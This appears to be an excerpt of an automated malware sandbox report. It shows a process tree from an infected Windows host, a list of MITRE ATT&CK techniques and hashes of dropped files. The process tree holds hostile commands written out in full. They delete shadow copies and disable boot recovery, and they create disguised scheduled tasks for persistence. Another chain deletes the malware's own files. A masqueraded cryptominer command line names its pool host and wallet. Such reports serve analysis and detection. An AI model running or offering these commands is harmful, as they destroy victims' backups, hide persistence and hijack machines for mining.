                                                                                                                                                                                                                                                                                                PID:9580
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:9572
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:9564
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                      wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:9984
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                      notepad.exe
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:10032
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5A7B.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\5A7B.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:6868
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\Update.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\Update.exe"
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:8672
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Red1_.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Red1_.exe"
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:5492
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Clip_.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Clip_.exe"
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:4084
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:1132
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:9476
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                        PID:6588
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:6504
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:9688
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                              PID:10012
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:9788
                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                PID:11092
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:6472
                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:9888
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                    PID:10072
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\VideoDriver.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\VideoDriver.exe"
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:9828
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                        PID:8768
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                          PID:8236
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:10224
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:4764
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\5A7B.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\5A7B.exe"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:4212
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                          ping 1.1.1.1 -n 1 -w 100
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                          PID:5800
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                          ping 1.1.1.1 -n 1 -w 900
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                          PID:2848
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:8244
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:8768
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:1200
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6A0C.exe
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\6A0C.exe
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:7440
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6A0C.exe
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\6A0C.exe
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                PID:5556
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                  icacls "C:\Users\Admin\AppData\Local\6cc88fe3-7366-4791-a99e-64be8deb1249" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                  PID:6412
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6A0C.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\6A0C.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:10016
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6A0C.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\6A0C.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:6408
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\3f42acd4-8ebf-4e5d-bd1e-7769e30efd4d\build2.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\3f42acd4-8ebf-4e5d-bd1e-7769e30efd4d\build2.exe"
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                            PID:9696
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\3f42acd4-8ebf-4e5d-bd1e-7769e30efd4d\build2.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\3f42acd4-8ebf-4e5d-bd1e-7769e30efd4d\build2.exe"
                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                PID:10084
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\3f42acd4-8ebf-4e5d-bd1e-7769e30efd4d\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:10580
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                      taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                      PID:10684
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                      PID:11220
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\3f42acd4-8ebf-4e5d-bd1e-7769e30efd4d\build3.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\3f42acd4-8ebf-4e5d-bd1e-7769e30efd4d\build3.exe"
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:10112
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\3f42acd4-8ebf-4e5d-bd1e-7769e30efd4d\build3.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\3f42acd4-8ebf-4e5d-bd1e-7769e30efd4d\build3.exe"
                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:3748
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                        PID:5836
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:4692
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:6956
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:8812
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6396
                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5088
                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                        MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:9684
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:6816
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:6200
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8DD2.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\8DD2.exe
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:9176
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4386.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4386.exe
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:9348
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:10076
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:4480
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:9500
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:9160
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:7960
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:2144
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:10416
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:10968
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20210824-2323.dm
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:408
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\CA97.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\CA97.exe
                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:10192

                                                                                                                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                  Execution

                                                                                                                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                                                                                                                                                                                                  Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                                                                                                                  T1031

                                                                                                                                                                                                                                                                                                                                                                                                  New Service

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1050

                                                                                                                                                                                                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1060

                                                                                                                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                  New Service

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1050

                                                                                                                                                                                                                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                                                                                                                                                                                                  Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1089

                                                                                                                                                                                                                                                                                                                                                                                                  File Deletion

                                                                                                                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                                                                                                                  T1107

                                                                                                                                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                                                                                                                                  File Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1222

                                                                                                                                                                                                                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1130

                                                                                                                                                                                                                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1081

                                                                                                                                                                                                                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                                                                                                                                                  T1012

                                                                                                                                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                                                                                                                                                  T1082

                                                                                                                                                                                                                                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                                                                                                                  T1120

                                                                                                                                                                                                                                                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1018

                                                                                                                                                                                                                                                                                                                                                                                                  Collection

                                                                                                                                                                                                                                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1005

                                                                                                                                                                                                                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                  T1102

                                                                                                                                                                                                                                                                                                                                                                                                  Impact

                                                                                                                                                                                                                                                                                                                                                                                                  Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                                                                                                                  T1490

                                                                                                                                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                    1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                    843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                    e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                    2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                    1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                    843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                    e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

